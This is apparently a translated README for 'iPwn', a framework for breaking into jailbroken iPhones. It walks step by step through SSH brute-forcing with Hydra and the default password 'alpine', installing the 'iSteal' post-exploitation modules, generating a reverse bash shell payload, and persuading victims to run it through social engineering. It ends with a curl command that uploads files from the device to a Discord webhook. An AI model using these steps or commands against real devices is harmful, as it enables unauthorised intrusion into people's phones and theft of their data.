一个用于iOS设备漏洞利用的框架。

<!> 注意:使用此工具尝试进入的iPhone必须已越狱 <!>
本项目仍在开发中。我正在添加更多用于后渗透利用的扩展和选项,以收集设备信息等。同时我也在研究如何将有效载荷放入正常的iOS插件中,从而使获取反向shell更加容易。
[6/2/21] - 为那些已将设备连接到电脑并希望进行调试的用户添加了一个额外菜单。将很快添加更多功能。
[6/2/21] - 为'iSteal'后渗透工具添加了4个额外模块。还添加了安装checkra1n越狱的选项。
[5/25/21] - 为'iSteal'后渗透工具添加了8个额外模块。
[5/25/21] - 为'iSteal'后渗透工具添加了2个额外模块。
iPwn是一个旨在利用iOS设备并获取其访问权限的框架。它还包含一个名为'iSteal'的迷你框架扩展,用于后渗透利用(在您获得设备访问权限之后)。以下描述将逐步介绍获取iOS设备访问权限并从中收集信息的不同方法和步骤。
获取iOS设备访问权限的第一种方法 - SSH暴力破解。
大多数已越狱且安装了Cydia的iOS设备都预装了OpenSSH。而且,通常密码都很弱或很常见,最常用的密码之一会包含在wordlist文件中,如果您从我的Github下载了iPwn,该文件应该在您的文件夹中。
那么让我们开始吧!首先,我们先运行脚本。
python main.py
然后,我们输入'brute'命令。(如果您想输入help并熟悉命令,也可以这样做。)

输入'brute'命令后。输入'help'即可显示所有可用命令。
现在,我们将使用'default'命令,通过包含最常见密码的字典文件启动SSH暴力破解。
系统会要求您输入目标IP地址,请确保输入正确且有效的IP,按回车,然后继续下一步。

<!> 如果您遇到错误,请确保已安装Hydra,您可以使用以下命令安装Hydra <!>
安装hydra的命令:
sudo apt install hydra
sudo pacman -S hydra
现在回到教程,如果您的电脑上已安装Hydra,它应该已经开始尝试暴力破解了。只需稍等20-40秒,如果设备确实使用了字典中提供的默认/常见凭据,那么Hydra就会显示一条小消息,指出正确的密码。

正如我们所见,正确的密码是'alpine'。现在我们可以在另一个终端窗口中通过执行'ssh root@ip_goes_here'来登录手机。当提示输入密码时,只需输入从Hydra获得的密码即可。

现在我们已成功登录!

此时我们可能想收集一些手机信息并对其进行控制,这将在稍后进行。因为首先,我们需要安装一些非常重要的东西。如果您想使用SCP传输自动化设置文件,也可以这样做。该文件位于/post-exploitation/post.sh。 一旦将'post.sh'文件传输到iOS设备上,通过执行'bash post.sh'来运行它,它就会开始安装并设置我们将要使用的后渗透工具。
<!> 注意:以下命令仅适用于那些希望手动安装必要软件包和工具的用户 <!>
运行以下所有命令来安装/设置所有需要的东西:
apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git
好的,现在我们已经安装了所有东西,我们可以进入'iSteal'文件夹并运行'iSteal'后渗透脚本。
python3 post.py
<!> 注意:当尝试运行Python文件时,请确保使用"python3"而不是"python"或"py" <!>
现在脚本应该已加载,如果您想使用'help'命令并四处查看,也可以这样做。

现在,我们将使用'list'命令来显示可用的后渗透模块/选项。

<!> 请注意:后渗透脚本将会有大量更新,并且会添加更多模块,因此为了准确性,此图片将随之更新 <!>
要使用一个模块,只需执行'use specific/module'。例如:use modules/list_installed_default_apps
正如您所见,当我们运行该模块时,它会显示目标iOS设备上已安装的默认应用程序。

获取iOS设备访问权限的第二种方法 - 反向Shell。
现在,我将向您展示第二种方法,这稍微高级一些。请记住,这部分我不会包含图片。
运行iPwn框架,执行'python main.py'
输入'payload'命令
等待有效载荷工厂加载。
选择您喜欢的有效载荷,例如:use payloads/factory/reverse_bash
输入您的IP
输入您的端口
然后您应该会看到一条消息,显示'payload generated'
输入'back'命令返回主菜单
输入'listen'命令开始监听传入连接
确保您的受害者通过终端或他们自己的方式运行脚本,尝试社会工程学,发挥创意!
一旦脚本在受害者的iOS设备上执行,您应该会获得一个连接
通过传输/post-exploitation中的'post.sh'文件并执行它来安装重要的软件包,或者手动完成。
现在您可以运行'iSteal'或'AutoEnum'后渗透工具
玩得开心!:)
<!> 如果您在步骤2中卡在了必须安装重要软件包/工具的部分,请回到步骤1,并复制安装软件包/工具的指南! <!>
有多种方式可以将文件传输到iOS设备,也有多种方式可以下载文件。从iOS设备提取和下载文件的最简单方法是使用Curl和Discord的Webhook。
<!> 注意:以下部分将演示如何使用curl从iOS设备提取和下载文件 <!>
步骤1:创建一个Discord服务器
步骤2:创建一个Webhook并复制链接
步骤3:在iOS设备上,导航到包含您想要获取的文件的目录。
步骤4:输入以下命令(将file_here.txt替换为您的文件名,将webhook_url_here替换为您的Webhook URL)
curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here
步骤5:等待大约10-50秒
完成!文件现在应该已上传到您的Discord服务器。现在您可以下载/查看该文件。
Windows 10 - 稳定
Garuda Linux - 稳定
基于Arch的发行版 - 稳定
支持的设备 [后渗透扩展应该适用于所有以下设备]
-----------------
第4代及更新的iPod
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7 Plus
iPhone 8
iPhone 8 Plus
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12
我自己测试过的设备 [我个人实际测试过的设备]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7 Plus
iPad Air
第四代iPod
